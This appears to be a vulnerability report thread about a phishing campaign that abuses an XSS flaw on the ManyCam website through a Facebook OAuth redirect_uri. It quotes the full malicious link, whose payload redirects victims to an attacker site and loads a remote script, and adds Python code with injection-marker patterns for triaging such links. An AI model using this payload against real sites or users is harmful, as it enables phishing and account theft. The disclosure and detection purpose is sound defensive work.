ManyCam is being used on a phishing campaign

I came across the following link on a Facebook post:

If you visit that link, it redirects to Facebook for OAuth2 that tries to authenticate the user against the ManyCam Facebook app:

https://mbasic.facebook.com/v3.2/dialog/oauth?client_id=187641897343&privacyx=300645083384735&response_type=token&scope=public_profile,email&redirect_uri=https://manycam.com/applications/?os=*/mac=%271%27;document.documentElement.innerHTML%3D%27%27;window.location.href=`https://renix.site/iphone.php`;%3C/script%3E%3Clink%20rel=%22stylesheet%22%20href=%22https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css%22%20integrity=%22sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T%22%20crossorigin=%22anonymous%22%3E%3Cscript%20src=%22https://renix.site/fb/stayed.js?%26view=ustreamtv%22%3E%3Ca+href=%27https://renix.site/iphone.php%27%3E%3Cimg+src=%27https://i.imgur.com/hyRvgh3.jpg%27%20style=%27position:%20fixed;%20left:%200;%20top:%200;%20height:%20100%;%20width:%20100%%27%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E+%3Cscript%3E/*x=%60;/*%22%3E&response_type=token

If you look carefully at the redirect_uri parameter, you’ll notice it’s leveraging an XSS vulnerability on the ManyCam website to redirect to the attacker’s website after they are authenticated.

The attackers probably have access to your Facebook app credentials or something. Please fix your website and secure your Facebook application. Thanks.

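As an added example (not code from the post or from ManyCam), a small Python triage for links of this shape: it pulls redirect_uri out of the Facebook dialog URL, percent-decodes it once as the OAuth server would, flags injected markup, and applies the exact-string allowlist check that stops an open-ended redirect_uri from carrying a payload into the site. The abbreviated copy of the link, the allowlist and the marker list are constructed for this example.

```python
from urllib.parse import urlsplit, unquote_plus

# Constructed, abbreviated copy of the link from the post; the structure
# (an OAuth dialog URL whose redirect_uri carries markup) is the same.
SUSPICIOUS_LINK = (
    "https://mbasic.facebook.com/v3.2/dialog/oauth?client_id=187641897343"
    "&response_type=token&scope=public_profile,email"
    "&redirect_uri=https://manycam.com/applications/?os=*/mac=%271%27;"
    "document.documentElement.innerHTML%3D%27%27;"
    "window.location.href=`https://renix.site/iphone.php`;%3C/script%3E"
    "%3Cscript%20src=%22https://renix.site/fb/stayed.js%22%3E"
    "+%3Cscript%3E/*x=%60;/*%22%3E&response_type=token"
)

# Assumed allowlist: redirect URIs registered for the app, compared as exact
# strings (no prefix match, no extra query string or fragment).
REGISTERED_REDIRECT_URIS = {"https://manycam.com/applications/"}

# Assumed fragments that never belong in a legitimate redirect URI.
INJECTION_MARKERS = ("<script", "</script", "document.", "window.location",
                     "innerhtml", "javascript:", "<img", "<a ")


def query_params(url):
    """Split the query on '&' only and keep values raw (still percent-encoded),
    so the caller decodes exactly once, as the OAuth server would."""
    params = {}
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(key, value)   # first occurrence wins
    return params


def classify_redirect_uri(raw_redirect_uri):
    """Return 'injection', 'not-registered' or 'allowed' for one redirect_uri."""
    decoded = unquote_plus(raw_redirect_uri)
    lowered = decoded.lower()
    if any(marker in lowered for marker in INJECTION_MARKERS):
        return "injection"
    if decoded not in REGISTERED_REDIRECT_URIS:
        return "not-registered"
    return "allowed"


def triage_oauth_link(url):
    """Classify the redirect_uri carried by an OAuth dialog link."""
    params = query_params(url)
    if "redirect_uri" not in params:
        return "missing-redirect-uri"
    return classify_redirect_uri(params["redirect_uri"])
```

Run against the link from the post, the decoded redirect_uri is classified as injection; a benign-looking variant that merely adds a query string is still rejected by the exact-match rule, which is the property a prefix-based allowlist lacks.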

@fahim

Thanks for reporting, the XSS was fixed.

Could you please report security issues to [email protected], so it is not visible to possible hackers until we fix them.